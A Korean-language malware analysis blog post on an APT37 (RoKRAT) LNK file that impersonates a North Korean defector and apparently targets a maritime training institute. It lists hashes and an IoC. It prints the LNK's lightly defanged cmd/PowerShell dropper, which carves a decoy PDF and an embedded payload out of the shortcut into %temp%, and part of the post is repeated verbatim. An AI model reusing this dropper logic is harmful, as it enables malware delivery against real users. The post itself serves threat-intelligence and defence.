북한 APT 리퍼(Reaper)에서 만든 탈북민 사칭 한국해양수산연수원 타겟 인것으로 추측이 되는 악성코드-정보접근권.lnk(2024.11.1)
Contents
오늘은 세계적으로 유명한 APT 조직 한 APT 북한 APT 리퍼(Reaper,APT37)에서 만든 탈북민 사칭 한국해양수산연수원 타겟 인것으로 추측이 되는 악성코드-정보접근권.lnk(2024.11.1)에 대해 글을 적어보겠습니다. 일명 RoKRAT
한국해양수산연수원 이라는 것이 해양수산인력의 교육 등의 업무를 하는 해양수산부 산하 기타공공기관입니다.
일단 해당 악성코드는 이력서 PDF는 누군가의 이력서를 훔쳐서 작성된 것으로 보이면 한국해양수산연수원 오션폴리텍 과정 쪽으로 접근을 하는것 같습니다.
해쉬값
파일명:정보접근권.lnk
사이즈:221 MB
MD5:89c0d2cc1e71b17449eec454161d60da
SHA-1:e9528f09f1e58ffc308893087f4a8b77aa1d544d
SHA-256:707e8cb56f32209ca837f2853801256cd3490ed2cc4b3428dc5e4238848f226d
입니다.
해당 악성코드 내부를 열어보면 다음과 같은 코드를 확인할 수가 있습니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinear(g)uments: /k (f)or /f "tokens=*" %a in ('dir C:\Windows\
SysWo(w)64\WindowsP(o)werShell\v1.0\*rshell(.)exe /s /b /od') do cal(l)
%a "$dirPath = Get-Lo(c)ation; if($dirPath -(M)atch 'Sys(t)em32' -or $d
irP(a)th -Match 'Program Fi(l)es') {$d(i)rPath = '%tem(p)%'};$exs=@('(.)
lnk');$ln(k)Path = Get-ChildItem -Path $(d)irPath -Recurse *.* -File | wh
ere {$_.extens(i)on -in $exs} | where-(o)bject {$_.length (-)eq 0x0DD5B80
2} | Select-Object -ExpandProperty FullName ;$lnkFile(=)New-Object System
.IO(.)FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.Fil(e)Ac
cess]::Read);$lnk(F)ile.Seek(0x0000111A, [System.IO.(S)eekOrig(i)n]::Begin
);$pdfFi(l)e=New-Object byte[] 0x00023A37;$lnkFile.Re(a)d($pdfFile, 0, 0x0
0023A37);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -
Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000(2)4B51,[System.IO.Se(e)kOrigi
n]::Begin);$exeFile=New-Object byte[] 0x000D9190;$(l)nkFile.Read($exeFile,
0, 0x000D9190);$exePath=$en(v):temp+'\caption.dat';sc $exePath $exeFile -E
ncoding Byte;$lnkFile.Seek(0x000FDC(E)1,[System.IO.SeekOrigin]::Begin);$st
ringByte = New-Object byte[] 0x00000636;$(l)nkFile.Read($stringByte, 0, 0x
00000636); $batStrPath = $env:temp+'\'+'elephant.dat';$s(t)ring = [System.
Text.Encoding]::UTF8.GetStri(n)g($stringByte);$string | Out-File -FilePath
$batStrPath …
한국해양수산연수원 이라는 것이 해양수산인력의 교육 등의 업무를 하는 해양수산부 산하 기타공공기관입니다.
일단 해당 악성코드는 이력서 PDF는 누군가의 이력서를 훔쳐서 작성된 것으로 보이면 한국해양수산연수원 오션폴리텍 과정 쪽으로 접근을 하는것 같습니다.
해쉬값
파일명:정보접근권.lnk
사이즈:221 MB
MD5:89c0d2cc1e71b17449eec454161d60da
SHA-1:e9528f09f1e58ffc308893087f4a8b77aa1d544d
SHA-256:707e8cb56f32209ca837f2853801256cd3490ed2cc4b3428dc5e4238848f226d
입니다.
해당 악성코드 내부를 열어보면 다음과 같은 코드를 확인할 수가 있습니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinear(g)uments: /k (f)or /f "tokens=*" %a in ('dir C:\Windows\
SysWo(w)64\WindowsP(o)werShell\v1.0\*rshell(.)exe /s /b /od') do cal(l)
%a "$dirPath = Get-Lo(c)ation; if($dirPath -(M)atch 'Sys(t)em32' -or $d
irP(a)th -Match 'Program Fi(l)es') {$d(i)rPath = '%tem(p)%'};$exs=@('(.)
lnk');$ln(k)Path = Get-ChildItem -Path $(d)irPath -Recurse *.* -File | wh
ere {$_.extens(i)on -in $exs} | where-(o)bject {$_.length (-)eq 0x0DD5B80
2} | Select-Object -ExpandProperty FullName ;$lnkFile(=)New-Object System
.IO(.)FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.Fil(e)Ac
cess]::Read);$lnk(F)ile.Seek(0x0000111A, [System.IO.(S)eekOrig(i)n]::Begin
);$pdfFi(l)e=New-Object byte[] 0x00023A37;$lnkFile.Re(a)d($pdfFile, 0, 0x0
0023A37);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -
Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000(2)4B51,[System.IO.Se(e)kOrigi
n]::Begin);$exeFile=New-Object byte[] 0x000D9190;$(l)nkFile.Read($exeFile,
0, 0x000D9190);$exePath=$en(v):temp+'\caption.dat';sc $exePath $exeFile -E
ncoding Byte;$lnkFile.Seek(0x000FDC(E)1,[System.IO.SeekOrigin]::Begin);$st
ringByte = New-Object byte[] 0x00000636;$(l)nkFile.Read($stringByte, 0, 0x
00000636); $batStrPath = $env:temp+'\'+'elephant.dat';$s(t)ring = [System.
Text.Encoding]::UTF8.GetStri(n)g($stringByte);$string | Out-File -FilePath
$batStrPath …
IoC
707e8cb56f32209ca837f2853801256cd3490ed2cc4b3428dc5e4238848f226d